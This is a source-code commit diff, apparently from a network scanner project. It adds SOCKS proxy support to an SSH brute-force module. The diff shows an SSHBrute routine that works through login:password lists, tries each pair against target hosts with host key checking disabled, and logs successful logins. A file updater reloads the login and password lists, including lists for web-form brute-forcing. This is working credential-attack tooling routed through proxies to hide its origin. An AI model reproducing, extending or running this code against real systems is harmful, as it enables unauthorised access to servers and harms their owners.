Partially implemented ssh over socks

This commit is contained in:
cora48 2015-03-27 16:38:53 +03:00
parent a17df57d90
commit ff816f4645
4 changed files with 118 additions and 65 deletions

View File

@ -416,7 +416,6 @@ void updateList(const char *fileName, long *szPtr, void *funcPtr(void)) {
long sz = getFileSize(fileName);
if(sz != *szPtr) {
FileUpdater::lk = std::unique_lock<std::mutex> (FileUpdater::filesUpdatingMutex);
*szPtr = sz;
funcPtr();
@ -428,13 +427,26 @@ void updateList(const char *fileName, long *szPtr, void *funcPtr(void)) {
int FileUpdater::updateLists() {
while(globalScanFlag) {
Sleep(60000);
if(!globalScanFlag) break;
loadOnce();
}
}
int FileUpdater::loadOnce() {
updateList("negatives.txt", &oldNegLstSize, updateNegatives);
updateList("login.txt", &oldLoginLstSize, updateLogin);
updateList("pass.txt", &oldPassLstSize, updatePass);
updateList("sshpass.txt", &oldSSHLstSize, updateSSH);
updateList("wflogin.txt", &oldWFLoginLstSize, updateWFLogin);
updateList("wfpass.txt", &oldWFPassLstSize, updateWFPass);
Sleep(60000);
}
}
void FileUpdater::FUClear() {
oldNegLstSize = 0;
oldLoginLstSize = 0;
oldPassLstSize = 0;
oldSSHLstSize = 0;
oldWFLoginLstSize = 0;
oldWFPassLstSize = 0;
}

View File

@ -26,8 +26,8 @@ public:
public:
static int updateLists();
static void passLoginLoader();
static void negativeLoader();
static int loadOnce();
static void FUClear();
};
#endif // FILEUPDATER_H

View File

@ -1,54 +1,97 @@
#include "SSHAuth.h"
#include "FileUpdater.h"
int _sshConnect(char *user, char *pass, const char *host, int port)
{
int _sshConnect(const char *user, const char *pass, const char *host, int port) {
CURL *curl = curl_easy_init();
curl_easy_setopt(curl, CURLOPT_NOSIGNAL, 0L);
char hostStr[128] = {0};
ZeroMemory(hostStr, sizeof(hostStr));
strcpy(hostStr, user);
strcat(hostStr, "@");
strcat(hostStr, host);
int sshTimeout = gTimeOut + 1;
ssh_session my_ssh_session = ssh_new();
if (my_ssh_session == NULL)
if (curl)
{
ssh_free(my_ssh_session);
curl_easy_setopt(curl, CURLOPT_URL, host);
curl_easy_setopt(curl, CURLOPT_PORT, port);
curl_easy_setopt(curl, CURLOPT_SSL_VERIFYPEER, 0L);
curl_easy_setopt(curl, CURLOPT_SSL_VERIFYHOST, 0L);
int proxyPort = std::atoi(gProxyPort);
if(strlen(gProxyIP) != 0 && (proxyPort > 0 && proxyPort < 65535)) {
curl_easy_setopt(curl, CURLOPT_PROXY, gProxyIP);
curl_easy_setopt(curl, CURLOPT_PROXYPORT, proxyPort);
} else {
curl_easy_setopt(curl, CURLOPT_PROXY, "");
}
curl_easy_setopt(curl, CURLOPT_CONNECTTIMEOUT, gTimeOut);
curl_easy_setopt(curl, CURLOPT_TIMEOUT, gTimeOut);
curl_easy_setopt(curl, CURLOPT_CONNECT_ONLY, 1L);
int res = curl_easy_perform(curl);
socket_t sock;
curl_easy_getinfo(curl, CURLINFO_LASTSOCKET, &sock);
if(res != CURLE_OK) {
curl_easy_cleanup(curl);
++ssh;
stt->doEmitionRedFoundData("[SSH]Cannot connect to: " + QString(host) + ":" + QString::number(port));
return 0;
}
if(sock != -1) {
ssh_session ssh_session = ssh_new();
if (ssh_session == NULL)
{
ssh_free(ssh_session);
curl_easy_cleanup(curl);
return -1;
};
ssh_options_set(my_ssh_session, SSH_OPTIONS_HOST, hostStr);
ssh_options_set(my_ssh_session, SSH_OPTIONS_PORT, &port);
ssh_options_set(my_ssh_session, SSH_OPTIONS_STRICTHOSTKEYCHECK, 0);
ssh_options_set(my_ssh_session, SSH_OPTIONS_GSSAPI_DELEGATE_CREDENTIALS, 0);
ssh_options_set(my_ssh_session, SSH_OPTIONS_TIMEOUT, &(gTimeOut + 1));
ssh_options_set(ssh_session, SSH_OPTIONS_STRICTHOSTKEYCHECK, 0);
ssh_options_set(ssh_session, SSH_OPTIONS_GSSAPI_DELEGATE_CREDENTIALS, 0);
ssh_options_set(ssh_session, SSH_OPTIONS_TIMEOUT, &sshTimeout);
int rc = ssh_connect(my_ssh_session);
//Fails to work on libssh-4.5 https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=688700
res = ssh_options_set(ssh_session, SSH_OPTIONS_FD, &sock);
if (rc != SSH_OK)
res = ssh_connect(ssh_session);
if (res != SSH_OK) //Offline
{
ssh_disconnect(my_ssh_session);
ssh_free(my_ssh_session);
ssh_disconnect(ssh_session);
ssh_free(ssh_session);
curl_easy_cleanup(curl);
++offlines;
return -2;
}
else
{
rc = ssh_userauth_password(my_ssh_session, NULL, pass);
if (rc != SSH_AUTH_SUCCESS)
res = ssh_userauth_password(ssh_session, NULL, pass);
if (res != SSH_AUTH_SUCCESS)
{
ssh_disconnect(my_ssh_session);
ssh_free(my_ssh_session);
ssh_disconnect(ssh_session);
ssh_free(ssh_session);
curl_easy_cleanup(curl);
return -1;
};
};
ssh_disconnect(my_ssh_session);
ssh_free(my_ssh_session);
ssh_disconnect(ssh_session);
ssh_free(ssh_session);
} else {
stt->doEmitionRedFoundData("[SSH]Socket = -1 " + QString(host) + ":" + QString::number(port));
}
}
curl_easy_cleanup(curl);
++ssh;
return 0;
}
char _get_ssh_banner(const char *ip, int port)
{
char _get_ssh_banner(const char *ip, int port) {
char recvBuff[256] = {0};
std::string buffer;
Connector::nConnect(ip, port, &buffer);
@ -63,14 +106,17 @@ char _get_ssh_banner(const char *ip, int port)
return *recvBuff;
}
int check_ssh_pass(char *user, char *pass, char *userPass, const char *host, int port, std::string *buffer, const char *banner)
{
int check_ssh_pass(const char *user, const char *pass,
const char *userPass, const char *host, int port,
std::string *buffer, const char *banner) {
int res = -1;
if(BALogSwitched) stt->doEmitionBAData("Probing SSH: " + QString(user) + ":" + QString(pass) + "@" + QString(host) + ":" + QString::number(port));
if(BALogSwitched) stt->doEmitionBAData("Probing SSH: " + QString(userPass) + "@" + QString(host) + ":" + QString::number(port));
res = _sshConnect(user, pass, host, port);
if(res == 0)
{
stt->doEmition_BAGreenData("[+] SSH: " + QString(user) + ":" + QString(pass) + "@" + QString(host));
stt->doEmition_BAGreenData("[+] SSH: " + QString(userPass) + "@" + QString(host));
buffer->append(userPass);
buffer->append("@");
buffer->append(host);
@ -78,22 +124,19 @@ int check_ssh_pass(char *user, char *pass, char *userPass, const char *host, int
buffer->append(banner);
return 0;
};
return res;
}
int SSHBrute(const char* host, int port, std::string *buffer, const char *banner)
{
int SSHBrute(const char* host, int port, std::string *buffer, const char *banner) {
char login[32] = {0};
char pass[32] = {0};
char temp[64] = {0};
BruteUtils::BConInc();
int sz = 0;
char *ptr1 = 0;
int res = -1;
for(int i = 0; i < MaxSSHPass; ++i)
{
FileUpdater::cv.wait(FileUpdater::lk, []{return FileUpdater::ready;});
if(!globalScanFlag) break;
strcpy(temp, sshlpLst[i]);
ptr1 = strstr(temp, ":");
@ -103,12 +146,9 @@ int SSHBrute(const char* host, int port, std::string *buffer, const char *banner
return -1;
}
sz = ptr1 - temp;
strncpy(login, temp, sz);
strncpy(login, temp, ptr1 - temp);
strcpy(pass, ptr1 + 1);
res = check_ssh_pass(login, pass, temp, host, port, buffer, banner);
ZeroMemory(login, sizeof(login));
ZeroMemory(pass, sizeof(pass));
ZeroMemory(temp, sizeof(temp));
@ -116,18 +156,15 @@ int SSHBrute(const char* host, int port, std::string *buffer, const char *banner
if(res == 0)
{
if(i == 0) return -2; //Failhit
BruteUtils::BConDec();
return 1;
}
else if(res == -2)
{
BruteUtils::BConDec();
return -2;
};
Sleep(500);
};
BruteUtils::BConDec();
return -1;
}
@ -138,7 +175,10 @@ int SSHAuth::SSHLobby(const char *ip, int port, std::string *buffer)
const char &banner = _get_ssh_banner(ip, port);
if(strlen(&banner) > 0)
{
return SSHBrute(ip, port, buffer, &banner);
BruteUtils::BConInc();
int res = SSHBrute(ip, port, buffer, &banner);
BruteUtils::BConDec();
return res;
};
return -1;
}

View File

@ -1825,7 +1825,7 @@ int startScan(char* args) {
stt->doEmitionIPRANGE(QString("--"));
stt->doEmitionThreads(QString::number(0) + "/" + QString::number(gThreads));
FileUpdater::loadOnce();
runAuxiliaryThreads();
if (gMode == 0)
@ -2115,6 +2115,7 @@ int startScan(char* args) {
}
void nCleanup(){
FileUpdater::FUClear();
Threader::cleanUp();
curl_global_cleanup();